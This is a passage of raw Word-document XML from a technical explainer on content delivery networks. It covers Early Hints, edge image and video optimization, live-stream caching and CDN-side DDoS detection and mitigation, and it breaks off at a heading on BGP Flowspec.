    <w:p w14:paraId="19D004F5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>[HTML body with references to style.css and app.js]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5AE6DF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CDN sends a 103 response with preload hints before the full 200 OK response is ready. The browser immediately starts fetching style.css and app.js — potentially saving 100–300ms of critical path latency. By the time the 200 OK arrives, the subresources are already loading or fully loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2657D7DF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN edges generate Early Hints based on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13015E35" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin-provided Link headers in the 103 response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3687C2B7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Learned resource dependencies (analyzing previous full responses to identify commonly co-requested resources).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1145A772" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Static configuration by the CDN operator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38358666" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Image and Video Optimization — Content-Aware Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7871C38E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-time image optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6809E2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Modern CDNs (Cloudflare Images, Fastly Image Optimizer, Akamai Image and Video Manager) perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on-the-fly image transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> at the edge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15500124" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394873FB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Client requests: /image.jpg?width=800&amp;format=webp&amp;quality=80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B963CFA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="3DADFFAA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5735E31D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>1. Cache check for (image.jpg, width=800, format=webp, quality=80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4956BEE1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>2. Cache miss → fetch original /image.jpg from origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE5946F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>3. Transform: resize to 800px width, convert to WebP, compress at quality 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457C1FDF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>4. Cache the transformed version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF74AB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>5. Serve to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288BA8FA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>6. Next request for same parameters → cache hit, instant serve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DE4508" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why CDN-level image optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0AFEF3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Format adaptation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Serve WebP to browsers that support it (Accept: image/webp), JPEG to older browsers — without maintaining separate asset versions at the origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E38F36" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resolution adaptation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Serve appropriately sized images to different viewport sizes — a 100px thumbnail doesn't need the same 4000px source image as a full-page hero image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF9E9C6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lazy transcoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Only transform images when they're actually requested, not as a batch job over the entire image library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A44FE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1216"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache the transformation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Once transformed, subsequent requests for the same parameters are served from cache — the transformation cost is paid once per unique parameter combination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5785AC0C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The image format efficiency hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E263827" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B450A4E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>JPEG (baseline): 100% reference size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A93FE3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>JPEG (progressive): ~95%  (renders progressively, same compression)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32048A02" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>WebP: ~70%              (30% smaller than JPEG at equivalent quality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732F3E73" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>AVIF: ~50%              (50% smaller — much better compression, slower encoding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767BBCCE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>JPEG XL: ~60%           (40% smaller, designed as JPEG successor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040734EF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Serving AVIF instead of JPEG reduces image bandwidth by 50% — enormous savings for image-heavy sites. CDN-level format selection based on Accept header enables this without application code changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23865F50" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Video delivery — adaptive bitrate (ABR) streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75033329" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDNs are the primary delivery mechanism for streaming video. Video is segmented into 2–10 second chunks at multiple quality levels (240p, 480p, 720p, 1080p, 4K) using HLS (HTTP Live Streaming) or MPEG-DASH (Dynamic Adaptive Streaming over HTTP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CEA774" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FAD4DA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Manifest file (cached, short TTL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C45C28" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  /video/stream.m3u8 → lists all quality levels and segment URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65101D68" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="36450570" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Segments (cached, long TTL — content never changes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EE5E53" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  /video/720p/segment_0001.ts → 5MB chunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A55851" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  /video/720p/segment_0002.ts → 4.8MB chunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939DDD1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF4BDA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The video player fetches segments based on current bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0DDB7C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Bandwidth good → request higher quality segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAA1676" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Bandwidth poor → request lower quality segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2C94CC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Buffering → switch to lower quality immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B55071D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN caching for ABR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FEB56E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Manifests: short TTL (60s) — they update as new content is added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11832B42" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Segments: very long TTL (weeks) — content is immutable once encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701F44D6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Segments are the vast majority of bandwidth — and they cache extremely well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA0B8FB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The live streaming CDN challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E55D1D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Live video has special constraints. Segments are generated in real time (2–10 second live segments). They don't exist until they're recorded and encoded. The manifest updates every few seconds to reference new segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3431D29D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN caching for live:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7669A9E6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Manifests: very short TTL (2–5s) — must stay nearly current.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7DDBB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Segments: long TTL (hours) — once generated, a past segment never changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F22E78" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CDN must aggressively cache segments (to handle the "flash crowd" at segment boundary when all viewers fetch the same new segment simultaneously) while keeping manifests fresh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED7BC6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request collapsing is critical for live streaming:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> At a segment boundary, millions of concurrent viewers simultaneously request the new segment. Without request collapsing, millions of requests hit origin simultaneously. With collapsing, each edge node sends one request per segment, and all local viewers receive the response simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB22E07" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="21DBCF3D">
          <v:rect id="_x0000_i4554" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C86E0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. CDN Security — The Edge as Defense Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF3263" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DDoS Mitigation at the CDN Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466CF933" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CDN's distributed, Anycast architecture is inherently DDoS-resistant. But CDNs also implement active DDoS mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0EF78" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Volumetric attack absorption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020FB58D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>A 500Gbps UDP flood targeting a CDN's Anycast IP is spread across all PoPs advertising that IP. If Cloudflare has 100 PoPs with 10Tbps aggregate capacity, each PoP absorbs 5Gbps — easily handled locally. The CDN's aggregate capacity (50–100+ Tbps) exceeds any practically feasible attack. The CDN absorbs the attack without any traffic reaching the origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB4855E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The attack detection pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D21E5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BA2841" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Traffic arrival at PoP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A72C30" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5720D4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Packet sampling (1:1000 sampling rate for high-traffic analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2593345E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4CBB57" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Flow classification (src IP, dst IP, protocol, packet size distribution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BBAD21" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDB17D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Anomaly detection (ML models trained on baseline traffic patterns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBEF4D5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C362DA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Attack signature matching (known attack patterns: DNS amplification, NTP amplification, SYN floods)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B40602" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53575923" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Mitigation action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59036875" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Rate limit suspicious source IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CB3B0D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Block attack signature packets at line rate (XDP/eBPF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A546CC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - Scrub traffic through specialized mitigation hardware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549A01A9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  - BGP blackhole announcement (null-route entire ASes sourcing attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333E8C7C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BGP Flowspec for rapid mitigation:</w:t>
      </w:r>
    </w:p>
